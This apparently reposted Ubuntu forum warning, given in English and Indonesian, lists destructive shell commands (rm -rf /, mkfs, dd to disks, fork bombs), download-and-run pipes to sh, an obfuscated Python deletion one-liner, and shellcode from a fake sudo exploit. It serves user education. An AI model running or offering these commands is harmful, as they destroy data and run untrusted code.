Spiga
Your Ad Here

Ubuntu Malicious Code. Remember This !

As requested by someone, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

Code:
rm -rf /
rm -rf .
rm -rf *
Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

Code:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)

Code:
:(){:|:&};:
In Perl

Code:
fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust

Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not! Maybe you can just use this as reference by putting the source if you stumbled coming to this blog : news-to-you.blogspot.

For example, 30 seconds in Python yields something like this:

Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

IN BAHASA

Seperti yang diminta seseorang, untuk tujuan edukasi user ubuntu, berikut ini adalah beberapa contoh umum dari perintah-perintah yang berbahaya yang kita harus berhati-hati dan waspada terhadapnya. Kembali diingatkan, ini adalah kode yang sangat berbahaya dan tidak boleh dicoba di komputer yang mempunyai koneksi ke komputer yang memiliki data data yang berharga -banyak di antara mereka menyebabkan rusaknya environment LiveCD.

Kembali diingatkan, PERINTAH-PERINTAH BERBAHAYA -Perhatikan tapi JANGAN DIJALANKAN.

Kode ini adalah jauh dari satu daftar yang sempurna, tetapi paling tidak dapat memberikan anda beberapa petunjuk terhadap orang-orang disekitar yang ingin memasukkan kode tersebut ke dalam komputer Anda. Ingat, kode ini dapat selalu disamarkan dalam satu perintah atau sebagai bagian dari suatu prosedur yang panjang, sehingga harus berhati-hati ketika sesuatu yang hanya tidak "rasakan benar" muncul.

Hapus semua file, hapus direktori yang ada, dan hapus file-file yang kelihatan di dalam direktori yang ada. Jelas terlihat mengapa perintah-perintah ini dapat berbahaya untuk dilaksanakan.

Kode :

rm -rf /
rm -rf .
rm -rf *

Reformat: Disebutkan setelah perintah mkfs, data akan dibinasakan; dihancurkan dan yang digantikan dengan suatu filesystem yang kosong.

Kode:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Menyebabkan data mentah untuk ditulis kedalam suatu blok. Sering kali ini akan menghantam filesystem dan menyebabkan hilangnya seluruh data

Kode:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Melaksanakan sejumlah besar proses-proses sampai sistim freeze, dan memaksa anda untuk melakukan hard reset yang dapat menyebabkan corruption, kerusakan data, dan kerusakan-kerusakan lainnya.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
Kode:

:(){:|:&};:

Pada Perl

Kode :

fork while fork

Tarbomb: Seseorang minta Anda untuk meng-ekstrak suatu arsip ke dalam satu direktori yang ada. Arsip ini dapat dirancang untuk pecah ke dalam jutaan file, atau menyuntik file-file ke dalam sistim dengan menebak-nebak filename. Anda perlu membuat kebiasaan mendekompressing file didalam direktori yang baru/bersih

Decompression bomb: Seseorang meminta Anda untuk meng-ekstrak suatu arsip dari file kecil yang didownload. Pada kenyataannya itu adalah data yang dikompres dan jika diekstrak akan memenuhi/memakai ratusan GB, dan mengisi hard drive Anda. Anda mestinya tidak menyentuh data dari satu sumber yang tidak dipercaya

Shellscript: Seseorang memberi anda link dengan file exe shellscript. Ini dapat berisi kode-kode yang berbahaya dan pencurian akan data pribadi Anda. Jangan menjalankan kode dari orang-orang yang tidak anda mempercayai

Kode:

wget http://some_place/some_file
sh ./some_file

Kode:

wget http://some_place/some_file -O- | sh


Compiling code: Seseorang memberi anda source program lalu mengatakan kepada anda untuk meng-compile nya. Adalah hal yang mudah untuk menyembunyikan kode tak dikenal sebagai suatu bagian dari suatu file yang besar dari source program, dan source program memberi lebih banyak kreativitas untuk menyembunyikan kode-kode perusak tersebut. Jangan meng-compile atau menjalankan suatu kode kecuali jika sumber berasal dari beberapa aplikasi yang terkenal, yang diperoleh dari suatu situs yang mempunyai nama yang baik.

Suatu contoh yang terkenal dari hal ini tersamar sebagai suatu proof of concept sudo exploit yang mengaku bahwa jika anda menjalankannya, sudo akan memberikan akses ke root tanpa shell. Ini adalah perintahnya:

Kode:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Kepada yang baru atau bahkan dengan pemakai computer yang berpengalaman, hal ini kelihatan seperti "kutukan mengkode bahan bualan" yang sangat khas dari suatu proof-of-concept yang aman. Bagaimanapun, hal ini benar-benar menjalankan rm - rf ~ / & yang akan menghancurkan direktori rumah Anda sebagai suatu pemakai reguler, atau semua file root. Jika anda bisa melihat perintah ini di dalam string hex, anda tidak perlu lagi untuk membaca pengumuman ini. Jika tidak, ingat bahwa berbagai hal ini dapat masuk dengan cara yang sangat roman.

Kembali diingatkan, daftar kode ini hanyalah daftar kode yang sederhana dan mestinya tidak digunakan sebagai suatu daftar acuan untuk menentukan jika suatu perintah adalah berbahaya atau tidak! Mungkin daftar ini bisa digunakan sebagai referensi tambahan dengan mencantumkan sourcenya, jika anda mampir ke blog ini terlebih dahulu : news-to-you.blogspot.

Sebagai contohnya, 30 detik di Piton menghasilkan sesuatu yang seperti ini:

Kode:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Di mana "sn!sg!+" hanyalah rm - rf * menggeser satu karakter keatas. Tentu saja ini adalah suatu contoh yang bodoh -Saya tidak akan berharap siapapun bersifat bodoh untuk melekatkan hal besar ini ke dalam terminal mereka tanpa mencurigai sesuatu yang salah mungkin terjadi.





AddThis Social Bookmark Button



source : ubuntuforum


0 comment(s):

Related Posts with Thumbnails